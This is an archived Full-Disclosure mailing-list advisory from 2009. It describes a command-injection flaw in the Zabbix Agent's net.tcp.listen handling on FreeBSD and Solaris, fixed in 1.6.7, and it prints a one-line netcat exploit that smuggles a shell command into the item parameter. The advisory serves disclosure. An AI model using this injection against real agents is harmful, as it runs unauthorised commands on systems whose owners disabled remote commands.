[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Zabbix Agent : Bypass of EnableRemoteCommands=0

To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Zabbix Agent : Bypass of EnableRemoteCommands=0
From: Nicob <nicob@xxxxxxxxx>
Date: Sun, 13 Dec 2009 16:28:30 +0100

>From Wikipedia : "Zabbix is a network management system application
[...] designed to monitor and track the status of various network
services, servers, and other network hardware."

        [Zabbix Agent : Bypass of EnableRemoteCommands=0]

Impacted software : Zabbix Agent (FreeBSD and Solaris only)
Zabbix reference : https://support.zabbix.com/browse/ZBX-1032
Patched version : 1.6.7

Faulty source code : function NET_TCP_LISTEN() in
libs/zbxsysinfo/(freebsd|solaris)/net.c

Exploit : $> echo "net.tcp.listen[80';id;echo ']"|nc -vn xxxxx 10050
Limitation : attacker must come from (or spoof) a trusted IP address

Changelog entry : fixed security vulnerability in processing of
net.tcp.listen under FreeBSD and Solaris agents

Nicob

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] [gif2png] long filename Buffer Overrun
Next by Date: [Full-disclosure] Zabbix Server : Multiple remote vulnerabilities
Previous by thread: [Full-disclosure] Unu hits Kaspersky
Next by thread: [Full-disclosure] Zabbix Server : Multiple remote vulnerabilities
Index(es):
- Date
- Thread